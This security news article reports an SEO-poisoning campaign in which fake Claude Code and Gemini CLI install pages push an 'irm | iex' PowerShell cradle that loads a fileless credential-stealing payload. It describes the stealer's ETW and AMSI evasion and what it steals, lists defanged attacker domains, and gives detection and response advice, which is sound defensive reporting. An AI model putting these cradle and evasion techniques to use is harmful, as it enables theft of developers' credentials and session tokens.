4 Min Read 
Developers searching Google for Anthropic’s Claude Code or Google’s Gemini CLI are being routed to convincing fake installation pages that hand them a single PowerShell command to paste into a terminal. Run it and a fileless infostealer loads straight into memory, scrapes credentials, session tokens and VPN keys and ships them to an attacker. The genuine tool installs at the same time, so nothing on screen looks wrong.
The campaign was first flagged on 21 April 2026 by an independent researcher who posts as @g0njxa on X. Security firm EclecticIQ published a full analysis on 21 May, tracing the operation to a single, financially motivated actor that began registering malicious domains in early March. The Claude Code lookalikes, claudecode[.]co[.]com and claude-setup[.]com, went up on 30 March.
There is no CVE here and nothing to patch. The weakness being exploited is a habit, copying a command off a web page and running it because the page looks like the real documentation.
The Trick Is the Parallel Install
The fake pages do not offer a download. They tell the developer to paste one line into the terminal, an irm | iex cradle that pipes Invoke-RestMethod into Invoke-Expression. EclecticIQ found the script runs two things at once. A hidden Shell.Application COM object quietly fetches the second-stage stealer from a setup domain such as gemini-setup[.]com and executes it in memory while the same script runs the real npm install -g @google/gemini-cli alongside it.
The legitimate package finishes installing in the terminal. The developer sees a working tool and moves on. By that point the stealer has already collected and exfiltrated the data.
Built to Run Without a Trace
The payload never touches disk. It patches the PSEtwLogProvider.m_enabled flag to silence PowerShell’s Event Tracing for Windows and disables the Antimalware Scan Interface, so it runs without tripping signature or heuristic detection. It loads C# types at runtime to sidestep monitored cmdlets, reads Windows Credential Manager and enumerates running processes to map the machine.
What it takes is broad, OAuth tokens, CI/CD credentials, corporate VPN configuration, browser cookies and DPAPI-protected secrets and session cookies for Slack, Microsoft Teams, Discord and Telegram. It also pulls cryptocurrency wallet data and files from cloud-sync folders including Proton Drive, iCloud Drive, Google Drive, MEGA and OneDrive, then sends everything encrypted to command-and-control servers at events[.]msft23[.]com and events[.]ms709[.]com.
A stolen session cookie is the dangerous part. It lets an attacker open a victim’s workspace with no password and no MFA prompt.
Who Is Being Hit and Who the Vendor Thinks Is
EclecticIQ assesses the campaign is aimed at developers in the US and UK, based on the actor’s use of.co.uk, .us.com and .us.org domains. That is a fair reading of the infrastructure but it is an inference from domain naming, not confirmed victimology. The same report lists confirmed intrusions across government, electronics, education and food and beverage organizations spanning the Americas, Asia-Pacific, Europe and the Middle East which puts the real footprint wider than the domain choices imply.
A second, overlapping operation that EclecticIQ tracks as InstallFix used paid Google Ads to push near-identical fake Claude Code pages to the top of search results. Same lure, different delivery. One buys the ranking, the other games it.
Developers are the point. They hold elevated privileges, access to source repositories and keys into the software supply chain so one compromised workstation can open far more than one machine.
There Is Nothing to Patch, So Change the Habit
Install from the vendor’s own domain, not the first search result and not a sponsored ad. Bookmark the official Claude Code and Gemini CLI documentation and use it. Treat any page that asks you to paste a PowerShell command into your terminal as hostile until you have confirmed the domain yourself.
For detection, hunt command-line telemetry for the irm | iex cradle, Invoke-RestMethod and Invoke-Expression chained together or their aliases, are a high-fidelity signal, according to EclecticIQ. Block and alert on the known C2 domains.
If a developer machine ran one of these commands, a password reset is not enough. A stolen session cookie stays valid until the session is killed, so revoke the OAuth tokens, rotate the CI/CD and VPN credentials and terminate the active sessions.
References
- SEO Poisoning Campaign Leverages Gemini and Claude Code Impersonation to Deliver Infostealer
- Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning
- SEO Poisoning Uses Fake AI Installers to Drop Infostealers
- Claude Fraud: When Trusted Tools Become the Attack Surface
This post is also available in:
Svenska
Related News
Daemon Tools Hackers Used Valid Certificates to Hide Backdoor for Month
Chinese-speaking attackers compromised Daemon Tools software installers and went undetected for nearly a month. The supply chain attack began on April 8, 2026, with trojanized…
May 7, 2026 
North Korean Hackers Hijacked Axios Package for 100 Million Users
North Korean state hackers compromised the Axios npm package on 31 March 2026, inserting a cross-platform remote access trojan into one of JavaScript's most widely…
April 22, 2026